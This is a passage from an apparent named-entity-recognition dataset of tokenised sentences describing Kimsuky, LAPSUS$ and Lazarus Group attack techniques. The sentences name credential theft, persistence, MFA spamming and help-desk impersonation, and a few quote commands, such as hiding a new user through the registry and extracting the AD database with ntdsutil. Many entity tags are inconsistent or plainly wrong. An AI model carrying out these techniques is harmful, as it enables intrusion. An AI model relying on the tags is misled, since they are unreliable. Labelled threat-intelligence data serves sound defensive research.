"Kimsuky", "has", "collected", "victim", "organization", "information", "including", "but", "not", "limited", "to", "organization", "hierarchy,", "functions,", "press", "releases,", "and", "others." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "run", "<code>reg", "add", "‘HKLM\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList’", "/v</code>", "to", "hide", "a", "newly", "created", "user." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "an", "information", "gathering", "module", "that", "will", "hide", "an", "AV", "software", "window", "from", "the", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "downloaded", "additional", "scripts,", "tools,", "and", "malware", "onto", "victim", "systems." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "sent", "internal", "spearphishing", "emails", "for", "lateral", "movement", "after", "stealing", "victim", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "JScript", "for", "logging", "and", "downloading", "additional", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "a", "PowerShell-based", "keylogger", "as", "well", "as", "a", "tool", "called", "MECHANICAL", "to", "log", "keystrokes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "Kimsuky", "has", "gathered", "credentials", "using", "Mimikatz", "and", "ProcDump." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Kimsuky", "has", "created", "accounts", "with", "<code>net", "user</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "a", "tool", "called", "GREASE", "to", "add", "a", "Windows", "admin", "account", "in", "order", "to", "allow", "them", "continued", "access", "via", "RDP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Kimsuky", "has", "staged", "collected", "data", "files", "under", "<code>C:\\Program", "Files\\Common", "Files\\System\\Ole", "DB\\</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "e-mail", "to", "send", "exfiltrated", "data", "to", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "attempted", "to", "lure", "victims", "into", "opening", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Kimsuky", "has", "lured", "victims", "into", "clicking", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "developed", "its", "own", "unique", "malware", "such", "as", "MailFetch.py", "for", "use", "in", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "disguised", "services", "to", "appear", "as", "benign", "software", "or", "related", "to", "operating", "system", "functions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "renamed", "malware", "to", "legitimate", "names", "such", "as", "<code>ESTCommon.dll</code>", "or", "<code>patch.dll</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "modified", "Registry", "settings", "for", "default", "file", "associations", "to", "enable", "all", "macros", "and", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "mshta.exe", "to", "run", "malicious", "scripts", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "a", "proprietary", "tool", "to", "intercept", "one", "time", "passwords", "required", "for", "two-factor", "authentication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "the", "Nirsoft", "SniffPass", "network", "sniffer", "to", "obtain", "passwords", "sent", "over", "non-secure", "protocols." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "obfuscated", "binary", "strings", "including", "the", "use", "of", "XOR", "encryption", "and", "Base64", "encoding.", "Kimsuky", "has", "also", "modified", "the", "first", "byte", "of", "DLL", "implants", "targeting", "victims", "to", "prevent", "recognition", "of", "the", "executable", "file", "format." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "pass", "the", "hash", "for", "authentication", "to", "remote", "access", "software", "used", "in", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "executed", "a", "variety", "of", "PowerShell", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Kimsuky", "can", "gather", "a", "list", "of", "all", "processes", "running", "on", "a", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "a", "file", "injector", "DLL", "to", "spawn", "a", "benign", "process", "on", "the", "victim's", "system", "and", "inject", "the", "malicious", "payload", "into", "it", "via", "process", "hollowing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "Win7Elevate", "to", "inject", "malicious", "code", "into", "explorer.exe." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Kimsuky", "has", "used", "a", "macOS", "Python", "implant", "to", "gather", "data", "as", "well", "as", "MailFetcher.py", "code", "to", "automatically", "collect", "email", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "obtained", "specific", "Registry", "keys", "and", "values", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "placed", "scripts", "in", "the", "startup", "folder", "for", "persistence", "and", "modified", "the", "`HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce`", "Registry", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "executed", "malware", "with", "<code>regsvr32s</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "a", "modified", "TeamViewer", "client", "as", "a", "command", "and", "control", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "RDP", "for", "direct", "remote", "point-and-click", "access." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "tools", "such", "as", "the", "MailFetch", "mail", "crawler", "to", "collect", "victim", "emails", "(excluding", "spam)", "from", "online", "services", "via", "IMAP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "`rundll32.exe`", "to", "execute", "malicious", "scripts", "and", "malware", "on", "a", "victim's", "network." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "downloaded", "additional", "malware", "with", "scheduled", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "searched", "for", "vulnerabilities,", "tools,", "and", "geopolitical", "trends", "on", "Google", "to", "target", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "searched", "for", "information", "on", "the", "target", "company's", "website." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "checked", "for", "the", "presence", "of", "antivirus", "software", "with", "<code>powershell", "Get-CimInstance", "-Namespace", "root/securityCenter2", "–", "classname", "antivirusproduct</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "purchased", "hosting", "servers", "with", "virtual", "currency", "and", "prepaid", "cards." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "Twitter", "to", "monitor", "potential", "victims", "and", "to", "prepare", "targeted", "phishing", "e-mails." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Kimsuky", "has", "created", "social", "media", "accounts", "to", "monitor", "news", "and", "security", "trends", "as", "well", "as", "potential", "targets." ], "ner_tags": [ "B-Idus", "O", "O", "I-Idus", "I-Idus", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "packed", "malware", "with", "UPX." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Kimsuky", "has", "used", "emails", "containing", "Word,", "Excel", "and/or", "HWP", "(Hangul", "Word", "Processor)", "documents", "in", "their", "spearphishing", "campaigns." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Kimsuky", "has", "sent", "spearphishing", "emails", "containing", "a", "link", "to", "a", "document", "that", "contained", "malicious", "macros", "or", "took", "the", "victim", "to", "an", "actor-controlled", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "links", "in", "e-mail", "to", "steal", "account", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Kimsuky", "has", "enumerated", "drives,", "OS", "type,", "OS", "version,", "and", "other", "information", "using", "a", "script", "or", "the", "\"systeminfo\"", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "`ipconfig/all`", "to", "gather", "network", "configuration", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "an", "instrumentor", "script", "to", "gather", "the", "names", "of", "all", "services", "running", "on", "a", "victim's", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "manipulated", "timestamps", "for", "creation", "or", "compilation", "dates", "to", "defeat", "anti-forensics." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "obtained", "and", "used", "tools", "such", "as", "Nirsoft", "WebBrowserPassVIew,", "Mimikatz,", "and", "PsExec." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Kimsuky", "has", "used", "Blogspot", "to", "host", "malicious", "content", "such", "as", "beacons,", "file", "exfiltrators,", "and", "implants." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "B-Tool", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "Visual", "Basic", "to", "download", "malicious", "payloads.", "Kimsuky", "has", "also", "used", "malicious", "VBA", "macros", "within", "maldocs", "disguised", "as", "forms", "that", "trigger", "when", "a", "victim", "types", "any", "content", "into", "the", "lure." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "B-Purp", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "used", "HTTP", "GET", "and", "POST", "requests", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "hosted", "content", "used", "for", "targeting", "efforts", "via", "web", "services", "such", "as", "Blogspot." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Kimsuky", "has", "used", "modified", "versions", "of", "open", "source", "PHP", "web", "shells", "to", "maintain", "access,", "often", "adding", "\"Dinosaur\"", "references", "within", "the", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "executed", "Windows", "commands", "by", "using", "`cmd`", "and", "running", "batch", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Kimsuky", "has", "created", "new", "services", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "removed", "a", "targeted", "organization's", "global", "admin", "accounts", "to", "lock", "the", "organization", "out", "of", "all", "access." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "added", "the", "global", "admin", "role", "to", "accounts", "they", "have", "created", "in", "the", "targeted", "organization's", "cloud", "instances." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "gathered", "detailed", "knowledge", "of", "an", "organization's", "supply", "chain", "relationships." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "targeted", "various", "collaboration", "tools", "like", "Slack,", "Teams,", "JIRA,", "Confluence,", "and", "others", "to", "hunt", "for", "exposed", "credentials", "to", "support", "privilege", "escalation", "and", "lateral", "movement." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "created", "global", "admin", "accounts", "in", "the", "targeted", "organization's", "cloud", "instances", "to", "gain", "persistence." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "used", "compromised", "credentials", "to", "access", "cloud", "assets", "within", "a", "target", "organization." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "searched", "public", "code", "repositories", "for", "exposed", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "LAPSUS$", "has", "searched", "a", "victim's", "network", "for", "code", "repositories", "like", "GitLab", "and", "GitHub", "to", "discover", "further", "high-privilege", "account", "credentials." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "searched", "a", "victim's", "network", "for", "collaboration", "platforms", "like", "Confluence", "and", "JIRA", "to", "discover", "further", "high-privilege", "account", "credentials." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "created", "new", "virtual", "machines", "within", "the", "target's", "cloud", "environment", "after", "leveraging", "credential", "access", "to", "cloud", "assets." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "gathered", "user", "identities", "and", "credentials", "to", "gain", "initial", "access", "to", "a", "victim's", "organization;", "the", "group", "has", "also", "called", "an", "organization's", "help", "desk", "to", "reset", "a", "target's", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "obtained", "passwords", "and", "session", "tokens", "with", "the", "use", "of", "the", "Redline", "password", "stealer." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "LAPSUS$", "has", "used", "DCSync", "attacks", "to", "gather", "credentials", "for", "privilege", "escalation", "routines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "B-OffAct", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "reconfigured", "a", "victim's", "DNS", "records", "to", "actor-controlled", "domains", "and", "websites." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "deleted", "the", "target's", "systems", "and", "resources", "both", "on-premises", "and", "in", "the", "cloud." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "searched", "a", "victim's", "network", "for", "organization", "collaboration", "channels", "like", "MS", "Teams", "or", "Slack", "to", "discover", "further", "high-privilege", "account", "credentials." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "uploaded", "sensitive", "files,", "information,", "and", "credentials", "from", "a", "targeted", "organization", "for", "extortion", "or", "public", "release." ], "ner_tags": [ "B-SamFile", "B-Way", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Purp" ] }, { "tokens": [ "LAPSUS$", "has", "deleted", "the", "target's", "systems", "and", "resources", "in", "the", "cloud", "to", "trigger", "the", "organization's", "incident", "and", "crisis", "response", "process." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "used", "the", "AD", "Explorer", "tool", "to", "enumerate", "users", "on", "a", "victim's", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "used", "the", "AD", "Explorer", "tool", "to", "enumerate", "groups", "on", "a", "victim's", "network." ], "ner_tags": [ "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "payed", "employees,", "suppliers,", "and", "business", "partners", "of", "target", "organizations", "for", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "B-Org", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "gathered", "employee", "email", "addresses,", "including", "personal", "accounts,", "for", "social", "engineering", "and", "initial", "access", "efforts." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "set", "an", "Office", "365", "tenant", "level", "mail", "transport", "rule", "to", "send", "all", "mail", "in", "and", "out", "of", "the", "targeted", "organization", "to", "the", "newly", "created", "account." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "exploited", "unpatched", "vulnerabilities", "on", "internally", "accessible", "servers", "including", "JIRA,", "GitLab,", "and", "Confluence", "for", "privilege", "escalation." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "LAPSUS$", "has", "gained", "access", "to", "internet-facing", "systems", "and", "applications,", "including", "virtual", "private", "network", "(VPN),", "remote", "desktop", "protocol", "(RDP),", "and", "virtual", "desktop", "infrastructure", "(VDI)", "including", "Citrix." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "LAPSUS$", "has", "gathered", "detailed", "information", "of", "target", "employees", "to", "enhance", "their", "social", "engineering", "lures." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "LAPSUS$", "has", "gathered", "detailed", "knowledge", "of", "team", "structures", "within", "a", "target", "organization." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "called", "victims'", "help", "desk", "and", "impersonated", "legitimate", "users", "with", "previously", "gathered", "information", "in", "order", "to", "gain", "access", "to", "privileged", "accounts." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "LAPSUS$", "acquired", "and", "used", "the", "Redline", "password", "stealer", "in", "their", "operations." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "replayed", "stolen", "session", "token", "and", "passwords", "to", "trigger", "simple-approval", "MFA", "prompts", "in", "hope", "of", "the", "legitimate", "user", "will", "grant", "necessary", "approval." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "spammed", "target", "users", "with", "MFA", "prompts", "in", "the", "hope", "that", "the", "legitimate", "user", "will", "grant", "necessary", "approval." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "used", "Windows", "built-in", "tool", "`ntdsutil`", "to", "extract", "the", "Active", "Directory", "(AD)", "database." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "accessed", "local", "password", "managers", "and", "databases", "to", "obtain", "further", "credentials", "from", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "leverage", "NordVPN", "for", "its", "egress", "points", "when", "targeting", "intended", "victims." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "purchased", "credentials", "and", "session", "tokens", "from", "criminal", "underground", "forums." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "shut", "down", "virtual", "machines", "from", "within", "a", "victim's", "on-premise", "VMware", "ESXi", "infrastructure." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "searched", "a", "victim's", "network", "for", "collaboration", "platforms", "like", "SharePoint", "to", "discover", "further", "high-privilege", "account", "credentials." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "called", "victims'", "help", "desk", "to", "convince", "the", "support", "personnel", "to", "reset", "a", "privileged", "account’s", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "obtained", "tools", "such", "as", "RVTools", "and", "AD", "Explorer", "for", "their", "operations." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "accessed", "internet-facing", "identity", "providers", "such", "as", "Azure", "Active", "Directory", "and", "Okta", "to", "target", "specific", "organizations." ], "ner_tags": [ "O", "O", "O", "O", "I-Org", "I-Org", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "I-Org", "O" ] }, { "tokens": [ "LAPSUS$", "has", "recruited", "target", "organization", "employees", "or", "contractors", "who", "provide", "credentials", "and", "approve", "an", "associated", "MFA", "prompt,", "or", "install", "remote", "management", "software", "onto", "a", "corporate", "workstation,", "allowing", "LAPSUS$", "to", "take", "control", "of", "an", "authenticated", "system." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "I-Org", "I-Org", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "LAPSUS$", "has", "used", "compromised", "credentials", "and/or", "session", "tokens", "to", "gain", "access", "into", "a", "victim's", "VPN,", "VDI,", "RDP,", "and", "IAMs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "B-Way", "O", "I-Tool", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "LAPSUS$", "has", "used", "VPS", "hosting", "providers", "for", "infrastructure." ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "WhiskeyDelta-Two", "contains", "a", "function", "that", "attempts", "to", "rename", "the", "administrator’s", "account." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lazarus", "Group", "malware", "IndiaIndia", "obtains", "and", "sends", "to", "its", "C2", "server", "the", "title", "of", "the", "window", "for", "each", "running", "process.", "The", "KilaAlfa", "keylogger", "also", "reports", "the", "title", "of", "the", "window", "in", "the", "foreground." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 